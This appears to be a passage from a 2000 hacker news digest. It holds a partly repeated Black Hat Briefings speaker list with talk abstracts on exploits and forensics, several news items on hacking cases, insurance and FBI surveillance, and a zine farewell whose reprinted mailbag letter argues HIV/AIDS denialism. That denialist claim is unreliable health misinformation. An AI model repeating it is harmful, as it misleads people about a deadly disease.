the Secure Networking - CQRE International Exhibition and Congress. He is the original author of L0phtCrack the award winning NT password auditing tool. In addition, Mudge co-authored Anti-Sniff, the world's first commercial remote promiscuous mode detection program. He has written over a dozen advisories and various tools -- many of which resulted in numerous CERT advisories, vendor updates, and patches. -------------------------------------------------------------------------------- Caezar - Malicious Information Gathering As in physical surveillance, information can be gathered about a target network without penetrating its security perimeter. Using computer virus and worm techniques to surround the target, an opponent can monitor and collect web and e-mail traffic. Critical business communications could be altered in transit or halted altogether. This discussion will cover independent autonomous agents, information filtering and malicious code propagation. Their Presentation!(PowerPoint 92k) See It! (surestream video file) Hear it! Real Audio (28k-isdn surestream) -------------------------------------------------------------------------------- Jeremy Rauch - UN*X Security Specialist, Security-Focus.com. Dave Ahmad -UN*X Security Specialist, Security-Focus.com. Routers, Switches & more: The glue that binds them all together. By now, anyone with an inkling about security knows that they need to protect their assets. We've all heard we need a firewall, and we all know that we need to lock down machines. What about the glue that binds them all together? The routers, switches, network administration protocols, authentication protocols...what about that stuff? This talk will go in to the security flaws you don't even think about, realize are there, or have dismissed as being inconsequential. Jeremy Rauch has been involved in discovering and researching security vulnerabilities from a number of different perspectives. Working with vendors, he has identified and helped fix over two dozen major security vulnerabilities. Jeremy is currently a developer at one of the largest security vendors, where part of his duties include the identification and reporting of security risks. Jeremy is also one of the founders of Security Focus, Inc. a centralized online security resource offering security news, products, events, books, tools, and one of the most comprehensive vulnerability listing on the net. Dave has been working with network and Unix security for a number of years and is a founding member of Security-Focus.com. He has dealt with both general Unix auditing and intrusion detection as well as secure software development. Dave is the co-host of Info.Sec.Radio, a radio show airing twice a month on both a Canadian radio station and the Internet via a RealAudio stream. Their Presentation!(PowerPoint 208k) See It! (surestream video file) Hear it! Real Audio (28k-isdn surestream) -------------------------------------------------------------------------------- Marcus Ranum - CEO Network Flight Recorder. Intrusion Detection and Network Forensics. Marcus Ranum is CEO of Network Flight Recorder, Inc., and has been specializing in Internet security since he built the first commercial firewall product in 1989. He has acted as chief architect and implementor of several other notable security systems including the TIS firewall tool kit, TIS Gauntlet firewall, whitehouse.gov, and the Network Flight Recorder. Marcus frequently lectures on Internet security issues, and is co-author of the "Web Site Security Source book" with Avi Rubin and Dan Geer, published by John Wiley and sons. Their Presentation! (PowerPoint 199k) (Long Version -PowerPoint 460k) See It! (surestream video file) Hear it! Real Audio (28k-isdn surestream) -------------------------------------------------------------------------------- JD Glaser - CEO of NT Objectives. Auditing NT - This talk will be the third in a series to address the issue of auditing an NT box after a break in. Specifically, we will extend our look under the hood to find places where altered files can hide as well as examine the evidence left behind by an intruder. This talk will also cover a set of tools that can uncover various hidden aspects of NT's Internal state. NT's built in tools are not sufficient in most cases for examining system state, so this talk include a small tutorial on a suite of free tools I have made to aid Windows NT intrusion research. Details will include: Examine NTFS file time stamping Examine NT Drivers behavior Examining permissions/file attributes Examining COM security backdoors Part III Looking for trojan behavior Part III Finding for backdoors in Windows NT JD Glaser is CEO of NT OBJECTives, Inc., a maker of security audit tools for Windows NT. Most notably, NTLast and Forensic Toolkit, which are free tools for the security community. He is an MCSE/MCSD that specializes in contract DCOM programming and NT network security. Clients have included, Intel, HP, Columbia Sportsware and Tripwire. Latest projects have involved NTFS file system code for Tripwire for NT and file system filters for real-time detection systems for NT that bypass NT's untrusted API. Their Presentation! (PowerPoint 101k) (Greg Hoglund - Caught! 175k .jpg) See It! (surestream video file) Hear it! Real Audio (28k-isdn surestream) -------------------------------------------------------------------------------- Jennifer Granick - Attorney at Law. International Legal issues surrounding computer hacking. A global computer network poses special questions in computer crime prevention and punishment. There is no international consensus on what a computer crime is or what should be prohibited conduct. Nor are there agreements on procedural matters such as transborder searches, data preservation, standard of proof or jurisdiction. This presentation will review the points of contention, discuss current efforts towards obtaining consensus and highlight the benefits and detriments of international consensus to investigators and civil libertarians alike. Jennifer Stisa Granick is a defense lawyer practicing in the areas of high tech and computer crime from her office in San Francisco. She defends unauthorized access, trade secret theft, and email interception cases nationally. Granick has written articles on wiretapping, workplace privacy and trademark law for Wired. Additionally, she has spoken at previous Black Hat Briefings and to NASA computer security professionals about computer crime laws, digital forensics and evidence collection. Their Presentation! (PowerPoint 53k) (Field Notes 38k .rtf) See It! (surestream video file) Hear it! Real Audio (28k-isdn surestream) -------------------------------------------------------------------------------- Martin Khoo - Assistant Director, Incident Handling, SingCERT Responding to Cyber Threats. IT and the Internet are fast becoming important parts of our national competitiveness. With the emerging globalization and worldwide connectivity, Internet security threats in other parts of the world can quickly translate into security issues that are potentially damaging to the local IT community. It is crucial for Singapore to be able to respond efficiently and effectively to Internet computer incidents and security breaches. It is important to have a localized CERT effort that offers security incident resolution services in a timely and effective manner. This talk will introduce the Singapore Computer Emergency Response Team (SingCERT) and cover the various programmes and initiatives that SingCERT offers to its constituency. It will also touch on the experience and lessons learnt through the handling and resolution of security incidents and highlight some of the trends in incidents reported to SingCERT. Martin is an Assistant Director with the Infocomm Development Authority (IDA) of Singapore. He takes charge of security incident management where he oversees a group of IT Security Consultants in providing security services to the various government organizations. He is also the Programme Manager of the Singapore Computer Emergency Response Team (SingCERT) which is the national level security incident response center charged with the prevention, detection and resolution of computer security incident on the Internet and Singapore ONE. He manages a group of Security Consultants providing incident resolution and security awareness promotion services to the local IT industry and the general IT users. Martin is a frequent speaker on subjects regarding security and incident handling. He last spoke at the PKI Conference on "Instilling Trust for Secure eCommerce" organized by CommerceNet Singapore in October 1999. Their Presentation! (PowerPoint 107k) See It! (surestream video file) Hear it! Real Audio (28k-isdn surestream) -------------------------------------------------------------------------------- Pierre Noel - CEO of ICSA.net Asia Pacific Internet Age: Why Security Architectures Fail (The Story of the Maginot Line Under Attack) Why are so many companies, organizations and agencies regularly hacked? Some of these regularly hacked organizations have however invested huge amounts in crafting their IT architectures. Security products, both hardware and software, are available off-the-shelf. Some of them underwent strong security certifications, and they are widely used in the Internet, even by the companies mentioned above. So, what's wrong with the strategy? In a 1998 survey on the 'barriers and inhibitors to eCommerce,' four out of the five most important inhibitors were security-related; the same survey in '99 showed these security-related inhibitors pushed back to rank 20 to 50! Does this mean that security is no longer an inhibitor to eCommerce? Or does this imply something else? Prior to the second World War, the French Army erected the Maginot Line to protected themselves against invasion. Pride of the nation, the Maginot line proved to be totally useless, and the invasion of France took place at a very rapid pace. Can we possibly transpose this story to the IT world? With a series of 'field' observations, Pierre will discuss the reasons for security weaknesses, and derive simple paths to reducing these exposures. Pierre Noel is currently the CEO of ICSA.net Asia Pacific and the president and founder of Burton & Brooks International, a consulting firm specialized in IT security for large enterprises and governments. As president of Burton & Brooks, Pierre is charged with the role of chief technical officer for the Hong Kong Post Public Key Infrastructure and Root Certification Authority project. Previously, Pierre was first the director of security best practice, Asia for PLATINUM technology, before he was promoted to vice president for Security Consulting Worldwide after Computer Associates' acquisition of PLATINUM. Pierre has more than 10 years of experience in providing independent consultancy worldwide. He specialized in the fields of Enterprise Security and large scale mission critical OLTP systems. Pierre was chief consultant and architect at the Open Software Foundation, then known as The Open Group. Their Presentation! (PowerPoint 1,118k) See It! (surestream video file) Hear it! Real Audio (28k-isdn surestream) -------------------------------------------------------------------------------- Wilfred Adrian Nathan - Head, Computer Forensics Branch, CID Singapore. Computer Crime: The law enforcement perspective with case studies. Their Presentation! (PowerPoint 497k) See It! (surestream video file) Hear it! Real Audio (28k-isdn surestream) -------------------------------------------------------------------------------- Joey__ (a.k.a Nishad Herath) - CTO of SecureSolv.com. Advanced Windows NT Security. In his talk, he will walk you through the exploitation of an unpublished real world Windows NT based buffer overflow exploit as an example discussing the following: * A reverse engineering approach to Windows NT software security exploration. How advanced tools like IDA and SoftICE can be utilised to analyze software and OS for vulnerabilities. (Who cares about source!) * Advanced Win32 shellcode techniques and how the most protected systems can be broken with innovative shellcode (including shellcode techniques unpublished to date). * Shellcode considerations specific to the Windows NT (including issues unpublished to date). * Protection from exploitation! discussion of innovative new buffer overflow prevention technology and advanced backdooring prevention for Windows NT. Joey__ is the CTO of SecureSolv.com, Sri Lanka's pioneering IT security consultancy firm specializing in IT security for e-Businesses, advanced security research, auditing, reverse-engineering services as well as technical consultancy for security products and services. With more than 6 years of experience in the industry, Joey__ specializes in Windows NT / Windows 2000 kernel architecture, security, systeem internals exploration, exploitation and intrusion protection techniques. He early work includes publishing the internal workings of Windows NT Native Call Interface which was undocumented at the time. SPEAKERS There were be approximately 14 speakers over two days, including a moderated panel discussion. 5/02/00 Presentation materials now on-line. A/V is encoding this week. The goal of the talks are to inform the audience with quality current state system vulnerabilities and fixes as well as future areas of concern. We cover a broad range of security issues from the perspective of the network administrator, system cracker, and IS managers. Because our unique speakers The Black Hat Briefings will offer the audience a deep insight into the real security issues facing your network with no vendor pitches! -------------------------------------------------------------------------------- Greg Hoglund - Rootkit.com Advanced Buffer Overflow Techniques This is a technical talk aimed at people who have already been exposed to buffer overflows and want to learn more. The talk assumes the audience has at least some knowledge of CPU's and Processes. For those of you who already understand buffer overflows, this talk will be a refreshing discourse on technique. We will show how the injection method can be decoupled from the payload. We then explore the details and challenges of injecting code into a remote process. We will also explore the payload, the encoding methods, and how to dynamically load new functions. Lastly, we discuss the possible effects of a payload, including network worms, virus, and rootkits. Greg Hoglund is a software engineer and researcher. His most notable achievement was the creation of the Asmodeus Security Scanner, a Windows NT based port scanner and ethernet sniffer, which he later sold to Webtrends, Corp. Additionally, Hoglund has written several white papers on content based attacks, kernel patching, and forensics. He currently works as a researcher for Tripwire Security Systems, exploring forensics issues. Their Presentation!(PowerPoint 247k) See It! (surestream video file) Hear it! Real Audio (28k-isdn surestream) -------------------------------------------------------------------------------- Batz - Independent Security Researcher. Casing the Joint. What we already know about your network. An overview of what an attacker already knows about your network. The information is described using an ASN.1 template for possible integration into autonomous agents, conspicuously similar to the ones described in Caezars presentation. Batz is an independent security researcher and Evil Super Villain who caused a stir last year by bringing to light some serious concerns with BGP4 configuration and implementation at Blackhat Briefings 99 in Las Vegas Nevada. Their Presentation!(PowerPoint 86k) See It! (surestream video file) Hear it! Real Audio (28k-isdn surestream) -------------------------------------------------------------------------------- Mudge - VP of R&D for @Stake. An analysis of tactics used in discovering "passive" monitoring devices. Formerly CEO and Chief Scientist at renowned "hacker think tank", the L0pht, Mudge is considered one of the nations leading "grey-hat hackers". He, along with the other members of the L0pht, are now heading up @Stake's research labs ensuring that the company is at the cutting edge of Internet security. Mudge is a widely sought after keynote speaker in various forums, including analysis of electronic threats to national security. He has been called to testify before the Senate Committee on Governmental Affairs, has briefed a wide range of members of Congress and has conducted training courses for the Department of Justice, NASA, the US Air Force, and other governmental agencies. A recognized name in crytpanalysis, Mudge has co-authored papers with Bruce Schneier that were published in the 5th ACM Conference on Computer and Communications Security, and the Secure Networking - CQRE International Exhibition and Congress. He is the original author of L0phtCrack the award winning NT password auditing tool. In addition, Mudge co-authored Anti-Sniff, the world's first commercial remote promiscuous mode detection program. He has written over a dozen advisories and various tools -- many of which resulted in numerous CERT advisories, vendor updates, and patches. -------------------------------------------------------------------------------- Caezar - Malicious Information Gathering As in physical surveillance, information can be gathered about a target network without penetrating its security perimeter. Using computer virus and worm techniques to surround the target, an opponent can monitor and collect web and e-mail traffic. Critical business communications could be altered in transit or halted altogether. This discussion will cover independent autonomous agents, information filtering and malicious code propagation. Their Presentation!(PowerPoint 92k) See It! (surestream video file) Hear it! Real Audio (28k-isdn surestream) -------------------------------------------------------------------------------- Jeremy Rauch - UN*X Security Specialist, Security-Focus.com. Dave Ahmad -UN*X Security Specialist, Security-Focus.com. Routers, Switches & more: The glue that binds them all together. By now, anyone with an inkling about security knows that they need to protect their assets. We've all heard we need a firewall, and we all know that we need to lock down machines. What about the glue that binds them all together? The routers, switches, network administration protocols, authentication protocols...what about that stuff? This talk will go in to the security flaws you don't even think about, realize are there, or have dismissed as being inconsequential. Jeremy Rauch has been involved in discovering and researching security vulnerabilities from a number of different perspectives. Working with vendors, he has identified and helped fix over two dozen major security vulnerabilities. Jeremy is currently a developer at one of the largest security vendors, where part of his duties include the identification and reporting of security risks. Jeremy is also one of the founders of Security Focus, Inc. a centralized online security resource offering security news, products, events, books, tools, and one of the most comprehensive vulnerability listing on the net. Dave has been working with network and Unix security for a number of years and is a founding member of Security-Focus.com. He has dealt with both general Unix auditing and intrusion detection as well as secure software development. Dave is the co-host of Info.Sec.Radio, a radio show airing twice a month on both a Canadian radio station and the Internet via a RealAudio stream. Their Presentation!(PowerPoint 208k) See It! (surestream video file) Hear it! Real Audio (28k-isdn surestream) -------------------------------------------------------------------------------- Marcus Ranum - CEO Network Flight Recorder. Intrusion Detection and Network Forensics. Marcus Ranum is CEO of Network Flight Recorder, Inc., and has been specializing in Internet security since he built the first commercial firewall product in 1989. He has acted as chief architect and implementor of several other notable security systems including the TIS firewall tool kit, TIS Gauntlet firewall, whitehouse.gov, and the Network Flight Recorder. Marcus frequently lectures on Internet security issues, and is co-author of the "Web Site Security Source book" with Avi Rubin and Dan Geer, published by John Wiley and sons. Their Presentation! (PowerPoint 199k) (Long Version -PowerPoint 460k) See It! (surestream video file) Hear it! Real Audio (28k-isdn surestream) -------------------------------------------------------------------------------- JD Glaser - CEO of NT Objectives. Auditing NT - This talk will be the third in a series to address the issue of auditing an NT box after a break in. Specifically, we will extend our look under the hood to find places where altered files can hide as well as examine the evidence left behind by an intruder. This talk will also cover a set of tools that can uncover various hidden aspects of NT's Internal state. NT's built in tools are not sufficient in most cases for examining system state, so this talk include a small tutorial on a suite of free tools I have made to aid Windows NT intrusion research. Details will include: Examine NTFS file time stamping Examine NT Drivers behavior Examining permissions/file attributes Examining COM security backdoors Part III Looking for trojan behavior Part III Finding for backdoors in Windows NT JD Glaser is CEO of NT OBJECTives, Inc., a maker of security audit tools for Windows NT. Most notably, NTLast and Forensic Toolkit, which are free tools for the security community. He is an MCSE/MCSD that specializes in contract DCOM programming and NT network security. Clients have included, Intel, HP, Columbia Sportsware and Tripwire. Latest projects have involved NTFS file system code for Tripwire for NT and file system filters for real-time detection systems for NT that bypass NT's untrusted API. Their Presentation! (PowerPoint 101k) (Greg Hoglund - Caught! 175k .jpg) See It! (surestream video file) Hear it! Real Audio (28k-isdn surestream) -------------------------------------------------------------------------------- Jennifer Granick - Attorney at Law. International Legal issues surrounding computer hacking. A global computer network poses special questions in computer crime prevention and punishment. There is no international consensus on what a computer crime is or what should be prohibited conduct. Nor are there agreements on procedural matters such as transborder searches, data preservation, standard of proof or jurisdiction. This presentation will review the points of contention, discuss current efforts towards obtaining consensus and highlight the benefits and detriments of international consensus to investigators and civil libertarians alike. Jennifer Stisa Granick is a defense lawyer practicing in the areas of high tech and computer crime from her office in San Francisco. She defends unauthorized access, trade secret theft, and email interception cases nationally. Granick has written articles on wiretapping, workplace privacy and trademark law for Wired. Additionally, she has spoken at previous Black Hat Briefings and to NASA computer security professionals about computer crime laws, digital forensics and evidence collection. Their Presentation! (PowerPoint 53k) (Field Notes 38k .rtf) See It! (surestream video file) Hear it! Real Audio (28k-isdn surestream) -------------------------------------------------------------------------------- Martin Khoo - Assistant Director, Incident Handling, SingCERT Responding to Cyber Threats. IT and the Internet are fast becoming important parts of our national competitiveness. With the emerging globalization and worldwide connectivity, Internet security threats in other parts of the world can quickly translate into security issues that are potentially damaging to the local IT community. It is crucial for Singapore to be able to respond efficiently and effectively to Internet computer incidents and security breaches. It is important to have a localized CERT effort that offers security incident resolution services in a timely and effective manner. This talk will introduce the Singapore Computer Emergency Response Team (SingCERT) and cover the various programmes and initiatives that SingCERT offers to its constituency. It will also touch on the experience and lessons learnt through the handling and resolution of security incidents and highlight some of the trends in incidents reported to SingCERT. Martin is an Assistant Director with the Infocomm Development Authority (IDA) of Singapore. He takes charge of security incident management where he oversees a group of IT Security Consultants in providing security services to the various government organizations. He is also the Programme Manager of the Singapore Computer Emergency Response Team (SingCERT) which is the national level security incident response center charged with the prevention, detection and resolution of computer security incident on the Internet and Singapore ONE. He manages a group of Security Consultants providing incident resolution and security awareness promotion services to the local IT industry and the general IT users. Martin is a frequent speaker on subjects regarding security and incident handling. He last spoke at the PKI Conference on "Instilling Trust for Secure eCommerce" organized by CommerceNet Singapore in October 1999. Their Presentation! (PowerPoint 107k) See It! (surestream video file) Hear it! Real Audio (28k-isdn surestream) -------------------------------------------------------------------------------- Pierre Noel - CEO of ICSA.net Asia Pacific Internet Age: Why Security Architectures Fail (The Story of the Maginot Line Under Attack) Why are so many companies, organizations and agencies regularly hacked? Some of these regularly hacked organizations have however invested huge amounts in crafting their IT architectures. Security products, both hardware and software, are available off-the-shelf. Some of them underwent strong security certifications, and they are widely used in the Internet, even by the companies mentioned above. So, what's wrong with the strategy? In a 1998 survey on the 'barriers and inhibitors to eCommerce,' four out of the five most important inhibitors were security-related; the same survey in '99 showed these security-related inhibitors pushed back to rank 20 to 50! Does this mean that security is no longer an inhibitor to eCommerce? Or does this imply something else? Prior to the second World War, the French Army erected the Maginot Line to protected themselves against invasion. Pride of the nation, the Maginot line proved to be totally useless, and the invasion of France took place at a very rapid pace. Can we possibly transpose this story to the IT world? With a series of 'field' observations, Pierre will discuss the reasons for security weaknesses, and derive simple paths to reducing these exposures. Pierre Noel is currently the CEO of ICSA.net Asia Pacific and the president and founder of Burton & Brooks International, a consulting firm specialized in IT security for large enterprises and governments. As president of Burton & Brooks, Pierre is charged with the role of chief technical officer for the Hong Kong Post Public Key Infrastructure and Root Certification Authority project. Previously, Pierre was first the director of security best practice, Asia for PLATINUM technology, before he was promoted to vice president for Security Consulting Worldwide after Computer Associates' acquisition of PLATINUM. Pierre has more than 10 years of experience in providing independent consultancy worldwide. He specialized in the fields of Enterprise Security and large scale mission critical OLTP systems. Pierre was chief consultant and architect at the Open Software Foundation, then known as The Open Group. Their Presentation! (PowerPoint 1,118k) See It! (surestream video file) Hear it! Real Audio (28k-isdn surestream) -------------------------------------------------------------------------------- Wilfred Adrian Nathan - Head, Computer Forensics Branch, CID Singapore. Computer Crime: The law enforcement perspective with case studies. Their Presentation! (PowerPoint 497k) See It! (surestream video file) Hear it! Real Audio (28k-isdn surestream) -------------------------------------------------------------------------------- @HWA 289.0 [IND] FBI Investigating Qualcomm Hacker ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.infowar.com/hacker/00/hack_070800a_j.shtml 7/05/00 FBI Investigating Qualcomm Hacker By Staff, Newsbytes WASHINGTON, D.C., U.S.A., 07 Jul 2000, 2:53 PM CST The FBI is investigating a University of Wisconsin student as a possible suspect in a series of hacker attacks against wireless provider Qualcomm, according to a San Diego Union-Tribune story today. The FBI has accused a University of Wisconsin graduate student of hacking into San Diego-based Qualcomm's computer networks, replacing files and installing "back doors, which allowed him to re-enter the system from a number of points on the network, the story reports. According to documents filed in San Diego federal court, the intrusions pierced Qualcomm's firewalls and network security, and jeopardized a number of the company's crucial servers that contain proprietary information. The story also reports that investigators learned the student broke into computer networks operated by three other companies, including NetOptions, a Los Angeles-based Internet service provider; CISNet of Youngstown, Ohio; and the TeX Users Group, an organization based in Massachusetts for those interested in text typesetting and font design. The FBI declined to comment on the case, and Qualcomm officials did not return calls seeking comment. @HWA 290.0 [IND] Lloyd's Offers Hacker Insurance ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.infowar.com/hacker/00/hack_071000a_j.shtml 7/10/00 Lloyd's Offers Hacker Insurance By The Associated Press Special to CNET News.com July 9, 2000, 11:30 p.m. PT http://news.cnet.com/news/0-1005-200-2232221.html Lloyd's offers hacker insurance By The Associated Press Special to CNET News.com July 9, 2000, 11:30 p.m. PT Lloyd's of London will offer up to $100 million in insurance coverage to clients of computer-security management firm Counterpane Internet Security against hacker-related losses to its business or its customers. San Jose, Calif.-based Counterpane in its announcement today claimed to be the first Internet-security service provider to offer a guarantee of direct financial reimbursement in the event a hacker breaks through its defenses and uses customer data. The guarantee is underwritten by insurance brokers Frank Crystal & Co. and SafeOnline, with additional coverage available for purchase from Lloyd's. "This is not for your home user; this is for Yahoo, this is for CD Universe, which lost all those credit card numbers (to a hacker) in January," said Bruce Schneier, chief technology officer at Counterpane. "It's threat avoidance. This, along with monitoring, is just another arrow in your quiver." Standard computer security includes firewalls, antivirus software that is updated weekly, and systems that can prevent the entry of hackers. But experts say much of that software contains weaknesses that can be exploited by enterprising hackers. An FBI-funded report in March suggested an epidemic of computer crime is under way across the United States, based on 643 responses, mainly from large companies and government agencies. Since March 1999, nine out of 10 organizations reported computer security breaches, according to the annual Internet crime survey by the FBI and the San Francisco-based Computer Security Institute. The most common forms of unauthorized computer intrusions are viruses, stolen laptop computers and employees abusing their Internet privileges. But businesses increasingly are reporting more serious incidents, including system penetration from the outside, financial fraud, data network sabotage or denial-of-service attacks--a deluge of repetitive requests sent to clog a Web site's computers until they seize up. Various organizations have estimated that hacker attacks this year have cost businesses tens of billions of dollars, mostly in lost time. A study released last week by Jericho, N.Y.-based Reality Research estimated businesses worldwide will lose more than $1.5 trillion this year because of computer viruses spread through the Internet. The "I Love You" virus, spread via email earlier this year, affected about 45 million computer files at a cost to companies of $2.61 billion alone, according to Computer Economics. Counterpane's Schneier said a $20,000 annual premium will provide coverage for $1 million in hacker losses; the cost rises to $75,000 for $10 million in losses. The price of any additional coverage, up to $100 million, must be negotiated with Lloyd's. Some regular insurance policies pay hacker losses under loss-of-business or act-of-vandalism clauses, but there are few policies written to specifically cover hacker attacks. And those that do often carry premiums that start at $100,000 and run up to $3 million. Analysts say the hacker insurance market is expected to grow to billions of dollars in annual premiums by the end of the decade, reflecting the growing popularity of e-commerce. But insurers have been reluctant to be the groundbreakers because there are no effective tools for measuring the risk. Insuretrust.com also assesses security risks but provides protection only for what it calls "residual risks." IBM and insurance broker Sedgwick Group provide products ranging from security reviews to compensation for lawsuits brought by victims of online credit card fraud. And International Computer Security Association, an Internet security company, announced in 1998 that it will pay corporations up to $250,000 if hackers successfully crack its computer system. Copyright © 2000 Associated Press. All rights reserved. This material may not be published, broadcast, rewritten, or redistributed. @HWA 291.0 [MM] Man charged with breaking into NASA computers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ July 12 2000 Source: MSNBC Submitted by: Spikeman http://www.msnbc.com/news/432167.asp?0nm=O11R Man charged with breaking into NASA computers WHITE PLAINS, N.Y., July 12 Federal authorities today arrested an alleged hacker who they say broke into NASA computers in 1998 and used one to host a chat room for other hackers. Mary Jo White, the U.S. attorney for the Southern District of New York, indicted Raymond Torricelli, 20, aka rolex, on five felony counts for credit card fraud, interception and unauthorized access to two National Aeronautics and Space Administration computers. White alleged in court documents that Torricelli broke into two computers at the agency’s Jet Propulsion Laboratory (JPL). Prosecutors allege the hackers, part of a group called #conflict, chatted about hacking, cracking, credit card fraud and how to use their computers to alter the results of the annual MTV Movie Awards, White said in a statement. CODES DECRYPTED Torricelli allegedly used the other JPL computer to place a sniffer program to intercept computer user names and passwords on networks. Prosecutors said they discovered 76,000 such passwords on Torricelli’s home computer many of which had been decrypted. Torricelli allegedly also cracked 800 other computers in his online sneaking spree. Conviction on the credit card fraud and password possession charges could lead to 10 years in jail and a $250,000 fine. The password interception charge carries a possible five-year term and $250,000 fine, and the two charges for computer intrusion are punishable by a year in jail for each count. WENT HOME TO MOM Torricelli’s court-appointed attorney, Suzanne Brody of Federal Legal Aid, said she had not yet had a chance to discuss the case in depth with her client. She said his computers were seized two years ago following the alleged activity, but Torricelli was not arrested then. Before being released on $50,000 bond today, Torricelli was understandably frightened by the experience of being arrested by federal authorities, Brody said. We got him bailed out, and he went home to his mother, Brody said. Torricelli is from New Rochelle. Last December, another New Rochelle teenager was sentenced for hacking America Online’s computer system after gaining knowledge of the Internet service provider working as a technical support volunteer for the company. @HWA 292.0 [MM] The FBI's Carnivore(s) Initiative (More big brother) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ MSNBC http://www.msnbc.com/news/432143.asp Forget the FBI’s snooping What about your boss? By Lisa Napoli © MSNBC July 12 Lots of people have their knickers in a knot over this unfortunately named surveillance program the FBI is using called Carnivore. (Sounds like a sequel to Survivor, but in actuality, it’s a sniffer that tracks the e-mail of criminal suspects.) The notion of the FBI forcing an Internet Service Provider to check out the e-mail of some bad guy isn’t such a terrible idea, on the face of it, though it certainly isn’t as sexy as a high-speed chase or something out of Shaft. Remember, folks, though it’s easy to forget: Law enforcement is actually good for society, and technology can aid and abet in the quest for law and order. BUT IT’S THE opportunity for screw-ups, and abuse, that has the American Civil Liberties Union, among others, concerned. Marc Rotenberg of the Electronic Privacy Information Center summed it up nicely: It goes to the heart of how the Fourth Amendment and the federal wiretap statute are going to be applied in the Internet age. Of course, there is the possibility that the FBI would inadvertently read your mail in addition to that of the suspects, and not only violate your privacy, but perhaps get you into trouble as well. (Two-for-one?) For that very reason, the infamous and ground-breaking Dutch ISP, XS4ALL, refused to comply with its governmental authorities three years ago when they asked to tap into one of their customers. Since then, the Dutch government has passed a shiny new telecommunications law that would give them the power to conduct such a digital wiretap. Here in the United States, we have the Electronic Communication Privacy Act, a 1986 law that is being interpreted by the government as allowing digital wiretaps using software like Carnivore. And while all that is interesting, what everyone seems to be forgetting is that your boss is more likely to be reading your e-mail than the FBI. This study from the latest American Management Association Monitoring and Surveillance study. Nearly three quarters of major US firms record and review employee communications and activities on the job, including their phone calls, e-mail, Internet connections, and computer files, the group reports. That’s twice what the AMA found in 1997, when the survey was first conducted. One of the most infamous users of blocking software in the workplace is Bloomberg, the financial news service. Starting in June 1999, Bloomberg started scanning outgoing e-mail on the service for words that the company considered racist, profane, or offensive. When the policy was first instituted, cheeky employees kept testing the waters to see which words would make it through. But just because your workplace mail isn’t scanned doesn’t mean someone isn’t watching. Stories about software that monitors your surfing activity to see if you’re wasting time on the clock are common. And keep in mind: Your superiors may start watching you if they suspect a problem. Case in point: The New York Times Co. says it doesn’t routinely scan e-mail, unless there have been complaints. And last year, complaints about racy e-mails circulating led to the firing of 23 people at an administrative facility in Virginia. The potentially thorny privacy issues raised by Carnivore are an issue, to be sure but what you say and how you surf at work might get you into more trouble, more immediately. Have you had an experience where your e-mail activity at work has been monitored? I’d love to hear from you. @HWA 293.0 [IND] Forbidden Knowledge calls it quits. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.mdma.za.net/fk http://www.mdma.za.net/fk-farewell.txt +--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==+ ( F 0 R B 1 D D 3 N K N 0 W L 3 D G 3 ) +--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==+ ( T h e F i n a l C h a p t e r ) +--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==+ Soundtrack for this Notice: REM - At my most beautiful The Forbidden Knowledge project, born just over a year and a half ago, has drawn to a close. Not because there were any fall-outs among us, or because I've lost interest, but simply because better opportunities have come along. Basically, Kokey was pondering reviving his e-zine, but was uncertain of his time constraints. I on the other hand was busy with mine, but not getting enough support. Our respective problems had a natural solution and that was working on a new zine together. (And besides, I can't risk the chance of Kokey releasing an e-zine that 0wnz mine unless I'm working on it too. ;P) So, yes, in some ways FK is dead, and in others, it lives on. I will still be working on something and releasing my warped texts on a quasi-regular basis, and they will still have that Wizdumb-esque insanity that makes them virtually unreadable. But FK as you know it is a thing of the past. And it will be sorely missed by me especially. Special thanks to everyone who has helped out with the zine in any way, wether it be feedback or article submissions, or whatever - I love you all. And for the record, here are all the people who submitted to FK, in chronological order... Wizdumb Pneuma Gevil Opium Brainsaw Cyberphreak Moe1 Hitsquad Vortexia Flashfire supo Nakamura Terabyte jus Cyberware CoLdBLood DrSmoke Sigma MercEnarY Virulent Jumpers DvD JungleG And there you have it ladies and gentlemen. The credits have rolled, the lights have come back on, and the few who are still in the room are on their way out. But hey - it's not too long before the first issue of the new, as yet to be named zine - which will totally 0wn FK anyway. So be sure to stay tuned to http://scene.textfiles.com watching out for it. :) Sorry that there are no articles in the final installment of FK, they've all been hijacked for the new zine. But I feel bad using nothing of the old FK12. Hmmm... Okay... Just to have something, I'll tack the mailbag from FK12 onto the end of this. Once again, Thanks for supporting FK Wizdumb -----------------------[ Lame-ass mailbag concatenated for nostalgia's sake From: 777 To: wizdumb@leet.org Date: Wed, 17 May 2000 19:04:38 -0700 Subject: Congratulations Congratulations for your excellent article about Chaos Magick in FK #11! -- Hail Eris!! All hail Discordia! [Wizdumb: We're glad you appreciated it - It's quite interesting how many chaote hackers there are around. Perhaps it has something to do with a lack of respect for rules and boundaries, or an urge to learn without being restricted. Or maybe hackers are just smart. :P Thanks for writing.] -----*****-----******----- [Wizdumb: Caution, Long Obnoxious Letter follows. Read on at your own risk.] From: "Drew Hendricks" To: wizdumb@leet.org Date: Thu, 18 May 2000 12:38:02 CDT Subject: http://www.virusmyth.com/aids/index.htm RE: Thabo Mbeki's public statement (and letter to Bill Clinton) saying that it can't be proved that HIV leads to AIDS - especially considering how much goddamn medical experience he has. And lets not even *begin* to consider the amount of damage a statement like that can cause when almost a *third* of the world is HIV positive. Thabo Mbeki, I sincerely hope that you get AIDS and die. I am actually *ashamed* to have such a fucking idiot as a president. OK, two things first: The man who announced that the virus he later named HIV causes AIDS was booted out of the American scientific community when it became obvious that he is a lying sack of shit who would sell you a cure for the common cold if he could convince you it was eating your momma's face. His name is Dr Robert Gallo - you should look him up. The man who invented the Polymerase Chain Reaction and won the Nobel Prize for doing so has personally told me that he has searched in vain for ANY paper which even claims to prove HIV causes AIDS and HE CANT FIND ONE. His name is Dr Kerry Mullis. For a Dr, he's a pretty neat surfer dude. Look him up, too. [Wizdumb: Right, I've been reading for two paragraphs and I haven't learnt anything - something tells me this is going to be one of *those* letters.] Additional, if you have not already flamed me out of sheer 